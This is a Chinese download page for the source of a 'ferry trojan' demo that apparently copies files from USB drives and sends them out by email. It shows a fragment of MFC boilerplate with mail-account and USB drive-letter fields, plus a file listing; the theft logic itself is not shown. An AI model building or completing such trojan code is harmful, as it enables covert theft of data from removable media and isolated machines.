资源简介
pop3协议的摆渡木马演示程序,vc6下验证通过!
代码片段和文件信息
// cheng_vir.cpp : Defines the class behaviors for the application.
//
#include “stdafx.h“
#include “cheng_vir.h“
#include “MainFrm.h“
#include “cheng_virDoc.h“
#include “cheng_virView.h“
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
#include
//#pragma comment(lib“shlwapi.lib“)
using namespace std;
#define BUFFER_BLOCK_SIZE 4096
#define DEAL_RETURN_CODE(retCode) { if((retCode)!=0) return retCode;}
// #define DEAL_SOCK_ERROR(retCodesock) if((retCode)==SOCKET_ERROR || (retCode)==0)\
// { \
// /* cout<<“Sock error: “< // closesocket(sock); \
// return -1; \
// }
/////////////////////////////////////////////////////////////////////////////
// CCheng_virApp
BEGIN_MESSAGE_MAP(CCheng_virApp CWinApp)
//{{AFX_MSG_MAP(CCheng_virApp)
ON_COMMAND(ID_APP_ABOUT OnAppAbout)
// NOTE - the ClassWizard will add and remove mapping macros here.
// DO NOT EDIT what you see in these blocks of generated code!
//}}AFX_MSG_MAP
// Standard file based document commands
ON_COMMAND(ID_FILE_NEW CWinApp::OnFileNew)
ON_COMMAND(ID_FILE_OPEN CWinApp::OnFileOpen)
// Standard print setup command
ON_COMMAND(ID_FILE_PRINT_SETUP CWinApp::OnFilePrintSetup)
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CCheng_virApp construction
CCheng_virApp::CCheng_virApp()
{
// TODO: add construction code here
// Place all significant initialization in InitInstance
m_b_Uget = FALSE;
m_NetStatusValue =-1;
m_ServerName=““;
m_MyEmail=““;
m_USERName=““;
m_USERPass=““;
m_Attachement_one=““;
m_Attachement_two=““;
m_Attachement_three=““;
}
/////////////////////////////////////////////////////////////////////////////
// The one and only CCheng_virApp object
CCheng_virApp theApp;
TCHAR G_U[2];//保存U盘的盘符
/////////////////////////////////////////////////////////////////////////////
// CCheng_virApp initialization
int ThreadProc_sendMail(LPVOID pParam)
{
CCheng_virApp *pApp = (CCheng_virApp*)pParam;
pApp->OnSendEmaiL();
return 0;
}
BOOL CCheng_virApp::InitInstance()
{
AfxEnableControlContainer();
// Standard initialization
// If you are not using these features and wish to reduce the size
// of your final executable you should remove from the following
// the specific initialization routines you do not need.
// 用应用程序名创建信号量
HANDLE hSem = CreateSemaphore(NULL 1 1 m_pszExeName);
// 信号量已存在?
// 信号量存在,则程序已有一个实例运行
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
// 关闭信号量句柄
//CloseHandle(hSem);
// 寻找先前实例的主窗口
HWND hWndPrevious = ::GetWindow(::GetDesktopWindow()GW_CHILD);
while (::IsWindow(hWndPrevious))
{
// 检查窗口是否有预设的标记?
// 有,则是我们寻找的主窗
if (::GetProp(hWndPrevious m_pszExeName))
{
// 主窗口已最小化,则恢复其大小
if (::IsIconic(hWndPrevious))
::ShowWindo
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 5139 2008-09-08 10:49 cheng_摆渡木马演示程序\cheng_vir\cheng_vir.clw
文件 36316 2008-09-11 21:24 cheng_摆渡木马演示程序\cheng_vir\cheng_vir.cpp
文件 5697 2008-09-08 10:49 cheng_摆渡木马演示程序\cheng_vir\cheng_vir.dsp
文件 543 2008-09-03 09:27 cheng_摆渡木马演示程序\cheng_vir\cheng_vir.dsw
文件 5299 2008-09-08 10:46 cheng_摆渡木马演示程序\cheng_vir\cheng_vir.h
文件 16204 2008-09-08 10:06 cheng_摆渡木马演示程序\cheng_vir\cheng_vir.rc
文件 1802 2008-09-03 09:27 cheng_摆渡木马演示程序\cheng_vir\cheng_virDoc.cpp
文件 1508 2008-09-03 09:27 cheng_摆渡木马演示程序\cheng_vir\cheng_virDoc.h
文件 23313 2008-09-11 21:24 cheng_摆渡木马演示程序\cheng_vir\cheng_virView.cpp
文件 2940 2008-09-07 23:37 cheng_摆渡木马演示程序\cheng_vir\cheng_virView.h
文件 1412 2008-09-05 13:37 cheng_摆渡木马演示程序\cheng_vir\Dlg_FileStatus.cpp
文件 1237 2008-09-05 13:26 cheng_摆渡木马演示程序\cheng_vir\Dlg_FileStatus.h
文件 1069 2008-09-05 09:51 cheng_摆渡木马演示程序\cheng_vir\Dlg_Filter.cpp
文件 1221 2008-09-05 09:51 cheng_摆渡木马演示程序\cheng_vir\Dlg_Filter.h
文件 5997 2008-09-07 22:02 cheng_摆渡木马演示程序\cheng_vir\Dlg_SetEmail.cpp
文件 1668 2008-09-07 21:42 cheng_摆渡木马演示程序\cheng_vir\Dlg_SetEmail.h
文件 1770 2008-09-05 13:37 cheng_摆渡木马演示程序\cheng_vir\Dlg_SetNet.cpp
文件 1224 2008-09-05 10:02 cheng_摆渡木马演示程序\cheng_vir\Dlg_SetNet.h
文件 7364 2004-03-18 15:54 cheng_摆渡木马演示程序\cheng_vir\MailMessage.cpp
文件 1541 2004-03-18 15:54 cheng_摆渡木马演示程序\cheng_vir\MailMessage.h
文件 3308 2008-09-08 10:04 cheng_摆渡木马演示程序\cheng_vir\MainFrm.cpp
文件 1749 2008-09-07 22:53 cheng_摆渡木马演示程序\cheng_vir\MainFrm.h
文件 5319 2008-09-01 15:55 cheng_摆渡木马演示程序\cheng_vir\POP3.cpp
文件 1799 2004-03-18 15:54 cheng_摆渡木马演示程序\cheng_vir\POP3.h
文件 5645 2008-08-29 07:16 cheng_摆渡木马演示程序\cheng_vir\POP3_1.cpp
文件 1179 2008-08-29 09:49 cheng_摆渡木马演示程序\cheng_vir\POP3_1.h
文件 4383 2008-09-03 09:27 cheng_摆渡木马演示程序\cheng_vir\ReadMe.txt
文件 1078 2008-09-03 09:27 cheng_摆渡木马演示程序\cheng_vir\res\cheng_vir.ico
文件 401 2008-09-03 09:27 cheng_摆渡木马演示程序\cheng_vir\res\cheng_vir.rc2
文件 1078 2008-09-03 09:27 cheng_摆渡木马演示程序\cheng_vir\res\cheng_virDoc.ico
............此处省略13个文件信息
相关资源
- OLED驱动源码
- tm1650+stm32f103源码(board_tm1650.c)
- cheat engine 7.2源码
- CrySearch内存搜索器源码
- FTP客户端源码(c++)
- MFC视频播放器源码(支持avi/wma/mp3等格
- CreatBitmap图片合成源码
- vs2008 can总线通讯源码
- 宠物管理系统课程设计(源码+数据库
- Windows扩展命令程序(源码)
- c语言实现火车订票系统(控制台)源
- 鼠标连点器(附源码)
- c++ 简易贪吃蛇源码
- 杀毒软件源码
- 经典外汇智能交易程序Amazing3.1源码(
- 微型文件系统源码(FatFs)
- 海康私有流分析接口源码(附使用说
- VC6 USB开发源码
- SVM算法实现(源码+文档)
- 俄罗斯方块游戏源码(Tetris)
- 步进电机控制(源码+文档)
- c++ 定时关机程序源码
- c++ 账务系统源码
- c语言课程设计:客房登记系统源码
- 贪吃蛇大作战(c源码+报告文档)
- 学生成绩管理系统(c源码)
- 职工信息管理系统源码(控制台)
- 吕鑫vc6c++数据结构视频源码
- 智商超高的中国象棋游戏源码(C++版
- 家谱管理系统(C++)源码以及文档
评论
共有 条评论